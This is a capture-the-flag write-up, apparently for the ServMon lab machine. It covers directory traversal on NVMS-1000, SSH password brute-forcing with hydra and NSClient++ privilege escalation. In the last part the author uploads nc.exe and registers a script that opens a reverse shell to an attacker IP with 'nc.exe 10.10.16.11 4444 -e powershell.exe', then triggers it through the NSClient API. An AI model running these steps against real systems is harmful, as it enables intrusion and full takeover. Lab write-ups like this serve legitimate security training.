Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
└─$ nmap -T5 -p- -sV -A -Pn 10.10.10.184
PORT STATE SERVICE VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
|
We face a Windows machine. We have access to a login page on port 80. This port is hosting a NVMS-1000 client. “NVMS-1000 is a monitoring client specifically designed for network video surveillance”.
Website login page at http://10.10.10.184/Pages/login.htm
Then, we have access to a NSClient++. We need to provide a password to have an access to pages.
NSClient++ monitoring site at https://10.10.10.184:8443/index.html
ftp
As the nmap scan shows us, we have an access to the FTP server.
1
2
3
4
5
6
7
8
9
10
11
12
|
└─$ ftp anonymous@10.10.10.184
Connected to 10.10.10.184.
ftp> ls -alih
02-28-22 07:35PM <DIR> Users
ftp> ls -alih
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
02-28-22 07:36PM 182 Notes to do.txt # Nathan
02-28-22 07:36PM 168 Confidential.txt # Nadine
|
We found 2 folders (Nathan & Nadine).
Nadine - Confidential.txt
1
2
3
4
5
6
7
|
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
|
A message addressed to Nathan. We now know that there is a possible Passwords.txt
file containing passwords on Nathan’s desktop.
Nathan - Notes_to_do.txt
1
2
3
4
5
6
|
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
|
Vulnerabilities
NVMS-1000
1
2
3
4
5
6
7
|
└─$ searchsploit nvms 1000
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
------------------------------------- ---------------------------------
|
NVMS is vulnerable to directory traversal exploit. Maybe we can get the content of the password file if Nathan don’t delete it.
NSClient++
1
2
3
4
5
6
7
|
└─$ searchsploit nsclient
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt
------------------------------------------------------------- ---------------------------------
|
NSClient is vulnerable to a local privilege escalation & an authenticated remote code execution on version 0.5.2.35.
NVMS-1000
First, I test if our NVMS is vulnerable to directory traversal.
Test of the directory traversal
And we have an access to any file ! Let’s try to grab the password file.
Directory traversal on Passwords.txt file
1
2
3
4
5
6
7
|
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
|
Nathan forgot to delete the file :) We got 7 passwords.
Bruteforce logins
Using hydra
I found valid credentials for nadine that allow us to connect into the ssh server.
1
2
3
4
5
6
|
└─$ hydra -L users -P pass 10.10.10.184 ssh
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
**************************6e904b
|
We can get the user flag :)
Path to the privesc
Local recon
Now that we are connected to the machine, we can get the password of the NSClient++ using nscp
command.
1
2
|
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
|
But we can’t login using that password.
Login failure using the admin password
Looking at the config file at C:\Program Files\NSClient++\nsclient.ini
we found that only localhost is allowed to log in.
1
2
3
4
5
6
7
|
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
|
I tried to upload WinPeas
but sadly Windows Defender delete it.
NSClient++
As shown by the searchexploit
scan, there is a privilege escalation vulnerability on NSClient where a low privilege authenticated user can become an administrator using scripts.
Nathan’s notes and with our local recon, we know that the NSClient service as been lock down. Only local user can access to the webpage.
Running nscp
command we can see if the service is vulnerable.
1
2
3
4
|
PS C:\Program Files\NSClient++> .\nscp.exe test
[...]
core NSClient++ - 0.5.2.35
|
The NSClient version is vulnerable!
So we need to have two enabled modules:
- CheckExternalScripts
- Scheduler
Using the nscp
command we can get all loaded modules.
1
2
3
4
5
6
7
8
9
10
11
|
PS C:\Program Files\NSClient++> .\nscp.exe settings --list --path /modules
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled
|
Both needed modules are enabled.
Then, we have to create a bat script that contains a reverse powershell. We have to upload nc
on the target.
1
2
3
4
5
|
# send nc on the target
└─$ scp nc.exe nadine@10.10.10.184:"C:\Windows\Temp\c"
# create a bat script that contains
C:\Windows\Temp\nc.exe 10.10.16.11 4444 -e powershell.exe
|
Now, we have to add our script to the NSClient settings. I tried to add it on the command line but it won’t work.
1
|
PS C:\Program Files\NSClient++> .\nscp.exe settings --path "/settings/external scripts/scripts" --key "exploit.bat" --set "C:\Windows\Temp\nc.exe 10.10.16.11 4444 -e powershell.exe"
|
NSClient++ API
After some research, I found that an API exist. The scripts API can be used to read view and modify the scripts which NSClient++ can run.
First, I check if we have an access to the API.
1
2
3
|
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin https://localhost:8443/api/v1/scripts
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
[{"module":"CheckExternalScripts","name":"ext","runtime_url":"https://localhost:8443/api/v1/scripts/ext","title":"CheckExternalScripts"}]
|
It works! Let’s try to add our script throught the API.
1
2
3
|
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/exploit.bat --data-binary "C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe"
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
Added exploit as scripts\exploit.bat
|
Checking if the script is well uploaded.
1
2
3
4
5
6
7
8
|
PS C:\Program Files\NSClient++> ls .\scripts\
Directory: C:\Program Files\NSClient++\scripts
[...]
-a---- 9/17/2022 8:14 AM 57 exploit.bat
PS C:\Program Files\NSClient++> cat .\scripts\exploit.bat
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e powershell.exe
|
Our script is now added. Now, we can use the queries API to run our script.
1
2
3
4
5
6
7
|
# be sure that nc as not been deleted by Windows Defender it happened to me
curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://localhost:8443/api/v1/queries/exploit/commands/execute?time=10s"
# on the host
└─$ rlwrap nc -lvnp 4444
C:\Program Files\NSClient++>whoami
nt authority\system
|
It works! We are now system owner ! We can get the flag :)
1
2
|
C:\Users\Administrator\Desktop>type root.txt
**************************9622c5
|
Powershell, Easy, Internal, Apache, Penetration Tester Level 1, Local File Inclusion, CVE-2019-20085, A05:2021-Security Misconfiguration, Enumeration, FTP, Clear Text Credentials, A06:2021-Vulnerable And Outdated Components, Tunneling, SSH, CVE Exploitation, Public Vulnerabilities, NVM-1000, Weak Permissions, NSClient++, Password Spraying, Port Forwarding, Anonymous/Guest Access